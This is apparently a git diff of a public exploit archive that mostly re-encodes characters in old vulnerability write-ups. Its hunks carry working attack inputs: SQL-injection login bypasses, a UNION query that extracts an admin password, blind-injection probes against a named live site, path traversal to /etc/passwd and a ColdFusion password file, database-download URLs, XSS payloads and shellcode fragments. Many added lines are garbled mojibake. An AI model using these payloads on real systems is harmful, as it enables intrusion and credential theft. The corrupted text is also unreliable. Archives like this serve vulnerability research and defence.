Founder: [ Moudi ] + [»] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... ] + [»] Team: [ EvilWay ] ########################################################################### ===[ Exploit ]=== - [»] http://localhost/[path]/database/guestbook.mdb + [»] http://localhost/[path]/database/guestbook.mdb Author: Moudi diff --git a/platforms/asp/webapps/7767.txt b/platforms/asp/webapps/7767.txt index ef12adc6d..23b3a7fcc 100755 --- a/platforms/asp/webapps/7767.txt +++ b/platforms/asp/webapps/7767.txt @@ -28,7 +28,7 @@ USERNAME-> PASSWORD-> ///admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5 union select 0,Security_AdminPassword,2,5,9,3 from tblCLM_config -ADMÝN LOGÝN-> +ADMÝN LOGÝN-> http://[target]/[path]//admin/ClassifiedListingsManager/manage.asp [[/SQL]] diff --git a/platforms/asp/webapps/7800.txt b/platforms/asp/webapps/7800.txt index 1019c1633..1bb5aaf06 100755 --- a/platforms/asp/webapps/7800.txt +++ b/platforms/asp/webapps/7800.txt @@ -18,12 +18,12 @@ [~]password : ' or '1=1 ############################################# -[~]İşinize Baqın :=) +[~]Ä°ÅŸinize Baqın :=) [~]Greetz For C4TEAM Members ############################################# -Derdimi dinledim, derdimden İĞRENDİM... -Onun derdini gördüm, derdime İMRENDİM... +Derdimi dinledim, derdimden Ä°ÄžRENDÄ°M... +Onun derdini gördüm, derdime Ä°MRENDÄ°M... ---------- FilistiN diff --git a/platforms/asp/webapps/7801.txt b/platforms/asp/webapps/7801.txt index d034db823..739caa1bd 100755 --- a/platforms/asp/webapps/7801.txt +++ b/platforms/asp/webapps/7801.txt @@ -18,12 +18,12 @@ [~]password : ' or '1 ############################################# -[~]İşinize Baqın :=) +[~]Ä°ÅŸinize Baqın :=) [~]Greetz For C4TEAM Members ############################################# -Derdimi dinledim, derdimden İĞRENDİM... -Onun derdini gördüm, derdime İMRENDİM... +Derdimi dinledim, derdimden Ä°ÄžRENDÄ°M... +Onun derdini gördüm, derdime Ä°MRENDÄ°M... ---------- FilistiN diff --git a/platforms/asp/webapps/7802.txt b/platforms/asp/webapps/7802.txt index 5838fa093..3c38eb40e 100755 --- a/platforms/asp/webapps/7802.txt +++ b/platforms/asp/webapps/7802.txt @@ -20,12 +20,12 @@ [~]password : ' or '1 ############################################# -[~]İşinize Baqın :=) +[~]Ä°ÅŸinize Baqın :=) [~]Greetz For C4TEAM Members ############################################# -Derdimi dinledim, derdimden İĞRENDİM... -Onun derdini gördüm, derdime İMRENDİM... +Derdimi dinledim, derdimden Ä°ÄžRENDÄ°M... +Onun derdini gördüm, derdime Ä°MRENDÄ°M... ---------- FilistiN diff --git a/platforms/asp/webapps/7803.txt b/platforms/asp/webapps/7803.txt index 4111e2910..0c5084254 100755 --- a/platforms/asp/webapps/7803.txt +++ b/platforms/asp/webapps/7803.txt @@ -23,12 +23,12 @@ :) ############################################# -[~]İşinize Baqın :=) +[~]Ä°ÅŸinize Baqın :=) [~]Greetz For C4TEAM Members ############################################# -Derdimi dinledim, derdimden İĞRENDİM... -Onun derdini gördüm, derdime İMRENDİM... +Derdimi dinledim, derdimden Ä°ÄžRENDÄ°M... +Onun derdini gördüm, derdime Ä°MRENDÄ°M... ---------- FilistiN diff --git a/platforms/asp/webapps/7816.txt b/platforms/asp/webapps/7816.txt index 36c1e217c..f560e607a 100755 --- a/platforms/asp/webapps/7816.txt +++ b/platforms/asp/webapps/7816.txt @@ -11,24 +11,24 @@ ============================================================================== - [»] We love Palestine, stop the war, too many innocent people!! + [»] We love Palestine, stop the war, too many innocent people!! ============================================================================== DS-IPN Paypal Shop Remote Database Disclosure Vulnerability ============================================================================== - [»] Script: [ DS-IPN Paypal Shop ] - [»] Language: [ ASP ] - [»] Website: [ http://shop.robs-projects.com/product_DS-IPN.html ] - [»] Founder: [ Moudi ] - [»] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... ] - [»] Team: [ EvilWay ] - [»] SiteWeb: [ www.evilway.org ] + [»] Script: [ DS-IPN Paypal Shop ] + [»] Language: [ ASP ] + [»] Website: [ http://shop.robs-projects.com/product_DS-IPN.html ] + [»] Founder: [ Moudi ] + [»] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... ] + [»] Team: [ EvilWay ] + [»] SiteWeb: [ www.evilway.org ] ########################################################################### ===[ Exploit ]=== - [»] http://localhost/[path]/Database/Sales.mdb + [»] http://localhost/[path]/Database/Sales.mdb Author: Moudi diff --git a/platforms/asp/webapps/7861.txt b/platforms/asp/webapps/7861.txt index c254fbd04..8df905508 100755 --- a/platforms/asp/webapps/7861.txt +++ b/platforms/asp/webapps/7861.txt @@ -21,12 +21,12 @@ [~]Password : ' or '1=1 ############################################# -[~]İşinize Baqın :=) +[~]Ä°ÅŸinize Baqın :=) [~]Greetz For C4TEAM Members ############################################# -Derdimi dinledim, derdimden İĞRENDİM... -Onun derdini gördüm, derdime İMRENDİM... +Derdimi dinledim, derdimden Ä°ÄžRENDÄ°M... +Onun derdini gördüm, derdime Ä°MRENDÄ°M... FilistiN ---------- diff --git a/platforms/asp/webapps/7963.txt b/platforms/asp/webapps/7963.txt index 6d00dd4a9..5bb2c0d06 100755 --- a/platforms/asp/webapps/7963.txt +++ b/platforms/asp/webapps/7963.txt @@ -1,5 +1,5 @@ ############################################# -#---- BY KACAK FROM TERRORİST CREW ----# +#---- BY KACAK FROM TERRORÄ°ST CREW ----# ############################################# [~]Author : Kacak @@ -18,7 +18,7 @@ [~]Download :http://www.aspindir.com/goster/2801 -[~] Vulnerability : (Auth Bypass) Sql İnjection +[~] Vulnerability : (Auth Bypass) Sql Ä°njection ############################################# diff --git a/platforms/asp/webapps/8070.txt b/platforms/asp/webapps/8070.txt index 97dde9831..adfdac433 100755 --- a/platforms/asp/webapps/8070.txt +++ b/platforms/asp/webapps/8070.txt @@ -2,7 +2,7 @@ [~] [~] Demo: http://www.aebest.com/home/home.asp [~] ---------------------------------------------------------- -[~] home: yildirimordulari.com if you wanna help you must register to my site and ı will do help to you xD +[~] home: yildirimordulari.com if you wanna help you must register to my site and ı will do help to you xD [~] [~] home: yildirimordulari.com eger yardim istiyosan siteye uye olmalisin xD [~] diff --git a/platforms/asp/webapps/8596.pl b/platforms/asp/webapps/8596.pl index e18ca6643..69a8ef647 100755 --- a/platforms/asp/webapps/8596.pl +++ b/platforms/asp/webapps/8596.pl @@ -6,7 +6,7 @@ # # Home: yildirimordulari.com , dafgamers.com , z0rlu.blogspot.com # -# Not: Bana Bug BulamIyorum, YapamIyorum Demeyin a.q Elin Gavuru YapIyor Sizler Niye YapamIyorsunuz. istemiyorsunuz isteseniz Sizlerde YaparsInýz +# Not: Bana Bug BulamIyorum, YapamIyorum Demeyin a.q Elin Gavuru YapIyor Sizler Niye YapamIyorsunuz. istemiyorsunuz isteseniz Sizlerde YaparsInýz # # Thanks: Str0ke, Cyber-Zone, Stack, AlpHaNiX, W0cker, Dr.Ly0n, ThE g0bL!N and all Friends # diff --git a/platforms/asp/webapps/9562.txt b/platforms/asp/webapps/9562.txt index 42d66d2f7..284293f44 100755 --- a/platforms/asp/webapps/9562.txt +++ b/platforms/asp/webapps/9562.txt @@ -22,7 +22,7 @@ SEC Consult Security Advisory < 20090901-0 > Vendor description: ------------------- -Templating for JavaServer™ Faces Technology plugs into JavaServer™ Faces to +Templating for JavaServerâ„¢ Faces Technology plugs into JavaServerâ„¢ Faces to make building pages and components easy. Creating pages or components is done using a template file. JSFTemplating's diff --git a/platforms/asp/webapps/9675.txt b/platforms/asp/webapps/9675.txt index 1b46735ae..c87730afa 100755 --- a/platforms/asp/webapps/9675.txt +++ b/platforms/asp/webapps/9675.txt @@ -1,56 +1,56 @@ - [☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢ -[☠] + [☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢ +[☠] [~] Tybe:(details.asp PropId) BL!ND SQL Injection Vulnerability -[☠] +[☠] [~] Vendor: www.hotwebscripts.co.uk -[☠] -[☠] Software: HotWeb Rentals -[☠] -[☠] author: ((я3d D3v!L)) -[☠] -[☠] Date: 15.2.2009 -[☠] -[☠] Home: CL053D -[☠] -[☠] contact: X@hotmail.co.jp -[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠ +[☠] +[☠] Software: HotWeb Rentals +[☠] +[☠] author: ((я3d D3v!L)) +[☠] +[☠] Date: 15.2.2009 +[☠] +[☠] Home: CL053D +[☠] +[☠] contact: X@hotmail.co.jp +[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠ -[☠] ERR0R CONSOLE +[☠] ERR0R CONSOLE WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N) -[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L +[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L -[☠] Exploit: +[☠] Exploit: -[☠] TRU3 : details.asp?PropId=1+and+1=1 +[☠] TRU3 : details.asp?PropId=1+and+1=1 - [☠] FALS3 : details.asp?PropId=1+and+1=2 + [☠] FALS3 : details.asp?PropId=1+and+1=2 -[☠]liv3 3xpL0!T: -[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1 -[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2 +[☠]liv3 3xpL0!T: +[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1 +[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2 - [☠] + [☠] N073: -R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠)) +R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠)) -4R48!4N-HACK3R!!القراصنه العرب +4R48!4N-HACK3R!!القراصنه العرب [~]-----------------------------{str0ke}----------------------------------------------------- -[~] Greetz tO: {str0ke} & XP_10 & روت شيل & ابو شهد & B0rN 2 K!LL & JUPA &D3V!L-FUCK3R & الزهيري - [~]70 ِALL ARAB!AN HACKER 3X3PT:LAM3RZ +[~] Greetz tO: {str0ke} & XP_10 & روت شيل & ابو شهد & B0rN 2 K!LL & JUPA &D3V!L-FUCK3R & الزهيري + [~]70 ِALL ARAB!AN HACKER 3X3PT:LAM3RZ [~] spechial thanks : ((dolly)) & ((7am3m)) &MAGOUSH ;) & EMAD & 0R45h3Y - [☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE'' + [☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE'' -[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007 +[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007 - [~]spechial FR!ND: 74M3M تميم + [~]spechial FR!ND: 74M3M تميم [~] !'M 4R48!4N 3XPL0!73R. diff --git a/platforms/asp/webapps/9857.txt b/platforms/asp/webapps/9857.txt index c249b4150..f0b615d3e 100755 --- a/platforms/asp/webapps/9857.txt +++ b/platforms/asp/webapps/9857.txt @@ -19,7 +19,7 @@ Vulnerability Type : Cross-Site Scripting (XSS) Affected page : history-storage.aspx Vulnerable parameters : HistoryKey, HistoryStorageObjectName Discovered by : -Sbastien Duquette (http://intheknow-security.blogspot.com) +Sébastien Duquette (http://intheknow-security.blogspot.com) Gardien Virtuel (www.gardienvirtuel.com) Original Advisory : http://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_EN.txt diff --git a/platforms/cfm/webapps/15120.txt b/platforms/cfm/webapps/15120.txt index 8067c6b69..e15f26283 100755 --- a/platforms/cfm/webapps/15120.txt +++ b/platforms/cfm/webapps/15120.txt @@ -18,7 +18,7 @@ As a result the vendor has released a patch addressing the issue and notified th Description -The fileManager.cfc component present in affected Mura CMS versions does not correctly sanitise the FILEID parameter before using the parameter to form file paths. As a result it possible for an attacker to supply malicious input which causes a different file to be accessed other than that intended. +The ‘fileManager.cfc’ component present in affected Mura CMS versions does not correctly sanitise the ‘FILEID’ parameter before using the parameter to form file paths. As a result it possible for an attacker to supply malicious input which causes a different file to be accessed other than that intended. Impact @@ -46,7 +46,7 @@ The resulting HTTP request looks GET /www/tasks/render/file/?FILEID=..\..\..\..\..\..\ColdFusion9\lib\password.properties HTTP/1.1 The payload will needs to be modified to reference a file on the system, relative to the installation path. -Upon receiving such a request, the server responds with a 200 OK containing the file specified. For the PoC above (retrieving password.properties) the server returned the following response: +Upon receiving such a request, the server responds with a 200 OK containing the file specified. For the PoC above (retrieving ‘password.properties’) the server returned the following response: HTTP/1.0 200 OK Connection: close @@ -96,7 +96,7 @@ Response timeline * 11/09/2010 - Fix released and vendor notifies paid support customers. * 11/09/2010 - stratsec confirms patch resolves issue. * 11/09/2010 - Advisory publication date agreed as 25/09/2010 - * 15/09/2010 Vendor publishes a blog post publicly disclosing the vulnerabilities presence. + * 15/09/2010 – Vendor publishes a blog post publicly disclosing the vulnerabilities presence. * 25/09/2010 - This advisory published. diff --git a/platforms/cgi/remote/20465.sh b/platforms/cgi/remote/20465.sh index abfdc171b..121fdf667 100755 --- a/platforms/cgi/remote/20465.sh +++ b/platforms/cgi/remote/20465.sh @@ -9,8 +9,8 @@ The 'cachemgr.cgi' module is a management interface for the Squid proxy service. # Usage miscachemgr host_vuln host_to_scan end_port -# Concept: Jacobo Van Leeuwen & Francisco S?a Mu?oz -# Coded by Francisco S?a Mu?oz +# Concept: Jacobo Van Leeuwen & Francisco S�a Mu�oz +# Coded by Francisco S�a Mu�oz # IP6 [Logic Control] PORT=1 diff --git a/platforms/cgi/remote/20506.html b/platforms/cgi/remote/20506.html index 35f5a3580..6dc30fb60 100755 --- a/platforms/cgi/remote/20506.html +++ b/platforms/cgi/remote/20506.html @@ -7,9 +7,9 @@ An insecure call to the open() function leads to a failure to properly filter sh Make a html form similar to:
- - - - +Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â +Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â +Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â +Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â
\ No newline at end of file diff --git a/platforms/cgi/webapps/17259.txt b/platforms/cgi/webapps/17259.txt index 866df493e..993ecd1cb 100755 --- a/platforms/cgi/webapps/17259.txt +++ b/platforms/cgi/webapps/17259.txt @@ -28,7 +28,7 @@ based file and directory manager written with Perl. The vulnerability can be exploited to access local files by entering special characters in variables used to create file paths. The attackers -use ../ sequences to move up to root directory, thus permitting +use “../” sequences to move up to root directory, thus permitting navigation through the file system. The issue discovered can only be exploited with an authenticated session diff --git a/platforms/cgi/webapps/18582.txt b/platforms/cgi/webapps/18582.txt index 3c2beef76..f8dd09799 100755 --- a/platforms/cgi/webapps/18582.txt +++ b/platforms/cgi/webapps/18582.txt @@ -248,7 +248,7 @@ value="8. Restart PHP" onClick="rst()" />



- 2012. © 2012. Zero Science Lab
Macedonian Information Security Research And Development Laboratory
diff --git a/platforms/cgi/webapps/27620.txt b/platforms/cgi/webapps/27620.txt index 450b740e0..74975d2d7 100755 --- a/platforms/cgi/webapps/27620.txt +++ b/platforms/cgi/webapps/27620.txt @@ -2,7 +2,7 @@ source: http://www.securityfocus.com/bid/17452/info Microsoft FrontPage Server Extensions are prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before it is rendered to other users. -An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user, with the privileges of the victim user??s account. This may help the attacker steal cookie-based authentication credentials and launch other attacks. +An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user, with the privileges of the victim userâ??s account. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
diff --git a/platforms/cgi/webapps/30587.txt b/platforms/cgi/webapps/30587.txt index 45b76a195..28401a2a0 100755 --- a/platforms/cgi/webapps/30587.txt +++ b/platforms/cgi/webapps/30587.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the device or to pre Root the camera/add a backdoor - http://www.example.com/admin/restartMessage.shtml?server= @@ -200,7 +200,7 @@ Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisorie is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. - Copyright 2014 | Vulnerability Laboratory [Evolution Security] + Copyright © 2014 | Vulnerability Laboratory [Evolution Security] -- diff --git a/platforms/cgi/webapps/34420.txt b/platforms/cgi/webapps/34420.txt index c1cb6de0f..abbea72a3 100755 --- a/platforms/cgi/webapps/34420.txt +++ b/platforms/cgi/webapps/34420.txt @@ -2,7 +2,7 @@ - VTLS Virtua InfoStation.cgi SQLi - CVE-2014-2081 - - Author: Jos Tozo < juniorbsd () gmail com > + Author: José Tozo < juniorbsd () gmail com > =====[Table of Contents]====================================================== diff --git a/platforms/cgi/webapps/35357.txt b/platforms/cgi/webapps/35357.txt index ce3594a6b..bdb76feb4 100755 --- a/platforms/cgi/webapps/35357.txt +++ b/platforms/cgi/webapps/35357.txt @@ -67,7 +67,7 @@ as well. This vulnerability was discovered and researched by Facundo Pantaleo and Flavio Cangini from Core Security Engineering Team. The publication -of this advisory was coordinated by Joaqun Rodrguez Varela from Core +of this advisory was coordinated by Joaquín Rodríguez Varela from Core Advisories Team. diff --git a/platforms/cgi/webapps/35900.txt b/platforms/cgi/webapps/35900.txt index c956599ad..d856e4d74 100755 --- a/platforms/cgi/webapps/35900.txt +++ b/platforms/cgi/webapps/35900.txt @@ -132,7 +132,7 @@ Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisorie is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. - Copyright 2015 | Vulnerability Laboratory - [Evolution Security GmbH] + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM diff --git a/platforms/cgi/webapps/36057.txt b/platforms/cgi/webapps/36057.txt index 63b36ec13..47172757f 100755 --- a/platforms/cgi/webapps/36057.txt +++ b/platforms/cgi/webapps/36057.txt @@ -147,4 +147,4 @@ RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 -Geschftsfhrer: Patrick Hof, Jens Liebchen \ No newline at end of file +Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/platforms/cgi/webapps/5304.txt b/platforms/cgi/webapps/5304.txt index 38f4fbf0b..6c979a513 100755 --- a/platforms/cgi/webapps/5304.txt +++ b/platforms/cgi/webapps/5304.txt @@ -1,5 +1,5 @@ HIS-Webshop is a shopping-system written in Perl by www.shoppark.de -The script doesn´t check the "t"-parameter. +The script doesn´t check the "t"-parameter. Example: http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00 diff --git a/platforms/cgi/webapps/790.pl b/platforms/cgi/webapps/790.pl index fdb3ee01f..5a59a7331 100755 --- a/platforms/cgi/webapps/790.pl +++ b/platforms/cgi/webapps/790.pl @@ -22,7 +22,7 @@ print ' # # # -# Special thanks to doc and WebDoctors +# Special thanks to doc and WebDoctor´s # ######################################################## diff --git a/platforms/cgi/webapps/8895.txt b/platforms/cgi/webapps/8895.txt index c42b73362..f88ccfc12 100755 --- a/platforms/cgi/webapps/8895.txt +++ b/platforms/cgi/webapps/8895.txt @@ -18,7 +18,7 @@ normal login for cookie pmadm=dGVzdA; -if ý do this: +if ý do this: pmadm=dGVzd(write any thing); @@ -32,7 +32,7 @@ pmadm=dGVzd123231212313; not login -if ý do wthis: +if ý do wthis: pmadm=dGVzd ' or '; diff --git a/platforms/freebsd/local/12090.txt b/platforms/freebsd/local/12090.txt index a90194645..e844aa1cc 100755 --- a/platforms/freebsd/local/12090.txt +++ b/platforms/freebsd/local/12090.txt @@ -5,7 +5,7 @@ Affected Applications: Secure Mail (Ironmail) ver.6.7.1 Affected Platforms: FreeBSD 6.2 / Apache-Coyote 1.1 Local / Remote: Local Severity: Medium - CVSS: 6.4 (AV:L/AC:L/Au:S/C:P/I:C/A:C) -Researcher: Nahuel Grisola +Researcher: Nahuel Grisolía Vendor Status: Official Patch Released. Install McAfee Email Gateway 6.7.2 Hotfix 2. Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf diff --git a/platforms/freebsd/local/12091.txt b/platforms/freebsd/local/12091.txt index 72f14238e..a510beca3 100755 --- a/platforms/freebsd/local/12091.txt +++ b/platforms/freebsd/local/12091.txt @@ -4,8 +4,8 @@ Release Date: Tue Apr 6, 2010 Affected Applications: Secure Mail (Ironmail) ver.6.7.1 Affected Platforms: FreeBSD 6.2 / Apache-Coyote 1.1 Local / Remote: Local -Severity: Low CVSS: 1.7 (AV:L/AC:L/Au:S/C:P/I:N/A:N) -Researcher: Nahuel Grisola +Severity: Low – CVSS: 1.7 (AV:L/AC:L/Au:S/C:P/I:N/A:N) +Researcher: Nahuel Grisolía Vendor Status: Official Patch Released. Install McAfee Email Gateway 6.7.2 Hotfix 2. Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf diff --git a/platforms/freebsd/local/19504.c b/platforms/freebsd/local/19504.c index ce965f22b..2ce468340 100755 --- a/platforms/freebsd/local/19504.c +++ b/platforms/freebsd/local/19504.c @@ -12,10 +12,10 @@ PTR: bfbfd750 setting up... -Username: ???????????#^?_?^_1?V_?V_?V_?V_1?;In real life: +Username: �����������#^�_�^_1҉V_�V_�V_�V_1�;In real life: -Home directory: ???Ue_( Shell: ??@? -Room: ?????????????#^?_?^_1?V_?V_?V_?V_1?Work phone: +Home directory: �׿�Ue_( Shell: ��@� +Room: �������������#^�_�^_1҉V_�V_�V_�V_1�Work phone: Home phone: Other: This user has no mail or mail spool. diff --git a/platforms/freebsd/local/22573.pl b/platforms/freebsd/local/22573.pl index 50363cbc5..891d9f221 100755 --- a/platforms/freebsd/local/22573.pl +++ b/platforms/freebsd/local/22573.pl @@ -17,7 +17,7 @@ It should be noted that while his vulnerability has been reported to affect List # this yields uid(0) if listproc is installed by root, otherwise something else $len = 16534; -$ret = pack("l",0xbfbfd176); # appx. middle of the env_var (as seen w. ? eye) +$ret = pack("l",0xbfbfd176); # appx. middle of the env_var (as seen w. � eye) $nop = "\x90"; $shellcode = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68". "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50". diff --git a/platforms/freebsd/local/22613.pl b/platforms/freebsd/local/22613.pl index 5142d7791..a9be1b2ff 100755 --- a/platforms/freebsd/local/22613.pl +++ b/platforms/freebsd/local/22613.pl @@ -10,7 +10,7 @@ found by # Luca Ercoli. This (ret/offset/shellcode) is made for FreeBSD 4.8-RELEASE. # maelstrom-3.0.5 Asteroids-style game for X Window System # shellcode by eSDee, he's cool. AV crap + .pl files + mailinglists == -flooded mbox #% +flooded mbox #¤% $len = 1000; $ret = pack("l",0xbfbffb7f); $nop = "\x90"; diff --git a/platforms/freebsd/remote/9278.txt b/platforms/freebsd/remote/9278.txt index 15ffc23b3..eec5ee1cb 100755 --- a/platforms/freebsd/remote/9278.txt +++ b/platforms/freebsd/remote/9278.txt @@ -76,7 +76,7 @@ ftp> cd isowarez 250 ftp> -+on freebsd you can symlink directories like ´/´ ++on freebsd you can symlink directories like ´/´ Cheerio, diff --git a/platforms/freebsd/webapps/12658.txt b/platforms/freebsd/webapps/12658.txt index 5c619d664..fed39d33a 100755 --- a/platforms/freebsd/webapps/12658.txt +++ b/platforms/freebsd/webapps/12658.txt @@ -4,8 +4,8 @@ Release Date: May 19, 2010 Affected Applications: Secure Mail (Ironmail) ver.6.7.1 Affected Platforms: FreeBSD 6.2 / Apache-Coyote 1.1 Local / Remote: Local -Severity: Medium CVSS: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C) -Researcher: Nahuel Grisola from Cybsec Labs +Severity: Medium – CVSS: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C) +Researcher: Nahuel Grisolía from Cybsec Labs Vendor Status: Vendor was informed. A patch is being developed. Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf Vulnerability Description: diff --git a/platforms/freebsd/webapps/24439.txt b/platforms/freebsd/webapps/24439.txt index 267617bf5..13fb56b2d 100755 --- a/platforms/freebsd/webapps/24439.txt +++ b/platforms/freebsd/webapps/24439.txt @@ -1,17 +1,17 @@ -???????????????????????????????????????????????????????????????????????????????? - ? Exploit Title: pfSense <= 2.0.1 XSS & CSRF during IPSec XAuth authentication - ? Date: 04/01/2013 - ? Author: Dimitris Strevinas - ? Vendor or Software Link: www.pfsense.org - ? Version: <= 2.0.1 - ? Category: Semi-Persistent XSS & CSRF - ? Google dork: - ? Tested on: FreeBSD -??????????????????????????????????????????????????????????????????????????????? +┴┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┴ + │ Exploit Title: pfSense <= 2.0.1 XSS & CSRF during IPSec XAuth authentication + │ Date: 04/01/2013 + │ Author: Dimitris Strevinas + │ Vendor or Software Link: www.pfsense.org + │ Version: <= 2.0.1 + │ Category: Semi-Persistent XSS & CSRF + │ Google dork: + │ Tested on: FreeBSD +┬┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┬ pfSense UTM distribution description -?????????????????????????????????????? +┌────────────────────────────────────┘ pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations protecting thousands of network devices. This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however it is not our primary focus. [source: www.pfsense.org] @@ -19,7 +19,7 @@ Vulnerability Summary -???????????????????????? +┌──────────────────────┘ pfSense versions 2.0.1 and prior are vulnerable to semi-persistent XSS and CSRF attack vectors, exploited by sending Javascript/HTML code as a username during the XAuth user authentication phase. XAUTH provides extended authentication for IPSec telecommuters by using authentication schemes such as RADIUS or internal user databases. [source: www.ciscopress.org] The vulnarability lies in diag_logs_ipsec.php which does not properly escape HTML characters in the Racoon log files. @@ -31,7 +31,7 @@ Exploit Path -??????????????? +┌─────────────┘ 1) Perform the Phase 1 and Phase 2 using a VPN Client and known credentials/certificates 2) During the XAuth provide a username like "> and a random password 3) The reflection of the XSS/CSRF is in the logs under Status > System Logs > IPSec @@ -39,13 +39,13 @@ Solution -??????????? +┌─────────┘ Patch available by vendor, streamlined to 2.1 URL: http://redmine.pfsense.org/projects/pfsense-tools/repository/revisions/0675bde3039a94ee2cadc360875095b797af018f Credits & Contact -???????????????????? +┌──────────────────┘ Dimitris Strevinas Obrela Security Industries CONTACT: www.obrela.com diff --git a/platforms/generator/shellcode/13286.c b/platforms/generator/shellcode/13286.c index e7322cf4e..8a3d0e219 100755 --- a/platforms/generator/shellcode/13286.c +++ b/platforms/generator/shellcode/13286.c @@ -1,7 +1,7 @@ /* ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// Alphanumeric Shellcode Encoder Decoder - Copyright © 1985-2008 Avri Schneider - Aladdin Knowledge Systems, Inc. All rights reserved. + Copyright © 1985-2008 Avri Schneider - Aladdin Knowledge Systems, Inc. All rights reserved. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by diff --git a/platforms/hardware/dos/10182.py b/platforms/hardware/dos/10182.py index ff9f69922..9b1f0f8ce 100755 --- a/platforms/hardware/dos/10182.py +++ b/platforms/hardware/dos/10182.py @@ -29,8 +29,8 @@ WebVuln Advisory: 1-003 The remote management interface of some 2wire modems is enabled by default. This interface runs over SSL on port 50001 with an untrusted issuer certificate. -++Espaol -Algunos mdems 2wire tienen la interfaz remota habilitada por default. +++Español +Algunos módems 2wire tienen la interfaz remota habilitada por default. La interfaz utiliza SSL con un certificado invalido en el puerto 50001. @@ -42,9 +42,9 @@ By requesting a special url from the Remote Management interface, an unathentica user can remotely reboot the complete device. ++ -Algunos mdems 2wire son vulnerables a un ataque de denegacin de servicio. -Un usuario no autenticado puede reiniciar el dispositivo enviando una peticin a -la interfaz de Administracin remota. +Algunos módems 2wire son vulnerables 